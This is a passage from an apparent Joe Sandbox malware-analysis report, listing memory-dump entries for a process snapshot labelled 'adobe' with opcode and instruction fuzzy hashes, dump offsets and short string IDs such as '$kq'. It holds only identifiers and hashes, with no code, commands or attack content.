                                    • Instruction ID: 054e66af619d5a97f12339dfd7af83f30c71d49917c6f9a81ea1a06f21e1049a
                                    • Opcode Fuzzy Hash: a53e36caa4953813d41e38859d86ab0137cb3fa4e62352159294ff674031525c
                                    • Instruction Fuzzy Hash: C311D3B1D01219AFCB00DF9AD984ACEFBB4FB48310F10812AE918A7340C374A554CFA5
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5022568ca92b8366d00d0872ca3664e3fac15258de3b095547e6d1b12c3425af
                                    • Instruction ID: 07098fd2d38a5ad721dde4eb093821802f3850c60750487ef02443e0fe6026f7
                                    • Opcode Fuzzy Hash: 5022568ca92b8366d00d0872ca3664e3fac15258de3b095547e6d1b12c3425af
                                    • Instruction Fuzzy Hash: BD01B130B002054FDB659F79D45076AB3E5EB86710F20886AE50ADB354EA22DC028780
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 62f41c7e0d508b3825a376c4d54955104b05cf254bcd02245a4f0fabafcfb6c0
                                    • Instruction ID: 720aa0d93e0fd16c3e4302254e1243e5b7fbba5a539a3e5a71e78d632045ecf5
                                    • Opcode Fuzzy Hash: 62f41c7e0d508b3825a376c4d54955104b05cf254bcd02245a4f0fabafcfb6c0
                                    • Instruction Fuzzy Hash: 8F016D31B001100BDB649AEEA95472AB3DEDBC9B20F30C83AF60AC7744EA66DC024391
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bddb0a0862535518a35547cb4d9b8799ff8e0b3dd7d5084750cf26e55203a171
                                    • Instruction ID: 2b1893aaeaf4edd7a04cf8cd48de7ca3133cfadc54f6ffc17368ccad7479fe75
                                    • Opcode Fuzzy Hash: bddb0a0862535518a35547cb4d9b8799ff8e0b3dd7d5084750cf26e55203a171
                                    • Instruction Fuzzy Hash: 6C018171B101100BDB65997DE85072E73DBDBC97A0F218839F50AC7344EA66DC034391
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d7d88f2408b6963e7d8eaa5774260f871d0b1b604d92540a66d7334b1033ff3b
                                    • Instruction ID: 57f9ab17d688bb72ba189dc2192a3fb24eea539b03c4406f59ebb8d097e13ac3
                                    • Opcode Fuzzy Hash: d7d88f2408b6963e7d8eaa5774260f871d0b1b604d92540a66d7334b1033ff3b
                                    • Instruction Fuzzy Hash: E401A430B001144FDB64EE7ED450B2AB3DAEB89714F208839F50AEB354EE22EC028790
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 93f566fd4226c7d6e1121850bb8204863e2072caed7a44e4bc620ea510568479
                                    • Instruction ID: e3bf2b6e77a4879ad66b5455987d1358743b1714c76549b6cea4b2ef5495b401
                                    • Opcode Fuzzy Hash: 93f566fd4226c7d6e1121850bb8204863e2072caed7a44e4bc620ea510568479
                                    • Instruction Fuzzy Hash: F5F037709183489BCB61CF79C95465A7BACDF07204F6148E6D4C5CB202E672C906C753
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1324371161
                                    • Opcode ID: 7c68fdf140f198933a199800939ecf3a41f067efc07bf8d48ea0aa5bcf24377d
                                    • Instruction ID: 663902fb3c52d17774b71c7185d8f74a2ea8550fd677068c92188c0c30822351
                                    • Opcode Fuzzy Hash: 7c68fdf140f198933a199800939ecf3a41f067efc07bf8d48ea0aa5bcf24377d
                                    • Instruction Fuzzy Hash: 3B123E30A103198FDB64DFA5C9546AEB7B6FF84304F208569E40AAB764DB349D85CF90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1078448309
                                    • Opcode ID: a8758b5da4e68f03aeb34380efa05299945913005a060915fcc5e1c4f1fa9c2d
                                    • Instruction ID: 53d947b435506bc57b80485e7fda7484b2695b9ad8b855eba0f04d0377141e55
                                    • Opcode Fuzzy Hash: a8758b5da4e68f03aeb34380efa05299945913005a060915fcc5e1c4f1fa9c2d
                                    • Instruction Fuzzy Hash: CE916E30A10309DFDB68EF66DA54B6EB7B6FF84314F208529E402A7794DB799C41CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                    • API String ID: 0-1342094364
                                    • Opcode ID: c1c692f593843bf8f2e5d7a982495fc9f63025350c8a7c5a7920156936c2d100
                                    • Instruction ID: 8d0882d24b1865f9925ce4df95d0f75f7c11c67a5dff2b54c5ddab032b185878
                                    • Opcode Fuzzy Hash: c1c692f593843bf8f2e5d7a982495fc9f63025350c8a7c5a7920156936c2d100
                                    • Instruction Fuzzy Hash: 3EF14A34A00309CFDB58EFA5D554A6EB7B6BF84304F648469E405DB768DB35EC86CB80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq
                                    • API String ID: 0-2881790790
                                    • Opcode ID: c1012d5c28f0b95342e643549ceed5bec0e09ee6b0f4fe2c712a2bbbb74d0460
                                    • Instruction ID: f0a1b81db2b348a4e8dfc76aad013f8e0bdb38d037b0e0f756e60fad57bbd0e0
                                    • Opcode Fuzzy Hash: c1012d5c28f0b95342e643549ceed5bec0e09ee6b0f4fe2c712a2bbbb74d0460
                                    • Instruction Fuzzy Hash: 92B15D30B102098FDB64EF69D65466EB7B6EF84300F248829E405DB799DB75DC82CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $kq$$kq$$kq$$kq
                                    • API String ID: 0-2881790790
                                    • Opcode ID: d2719a98e0089bab439cbde4dca3084e856470eeb79238c1ce11cb255ba04cf1
                                    • Instruction ID: 843e2fbadf9ee9d4c90c2e3dce59051c23590d45908180e5805085248ad11289
                                    • Opcode Fuzzy Hash: d2719a98e0089bab439cbde4dca3084e856470eeb79238c1ce11cb255ba04cf1
                                    • Instruction Fuzzy Hash: 39518030E103059FDF65DB69D9906AEB7B6EF84301F24892AE806E7B54DB35EC41CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.4147107248.0000000006960000.00000040.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6960000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LRkq$LRkq$$kq$$kq
                                    • API String ID: 0-2392252538
                                    • Opcode ID: 032ce3283fb5c9a1524d8a22e96620d3e4cb59b17a0c6a91a4488cfca651d879
                                    • Instruction ID: 1b89e92f1005f6b3a572063a8cb089dcbda6cea95e77dc32269e5e46315ee30e
                                    • Opcode Fuzzy Hash: 032ce3283fb5c9a1524d8a22e96620d3e4cb59b17a0c6a91a4488cfca651d879
                                    • Instruction Fuzzy Hash: 4051A630B003059FDB58EB69DA44B6AB7B6FF88304F148569E415DB7A9DB34EC41CBA0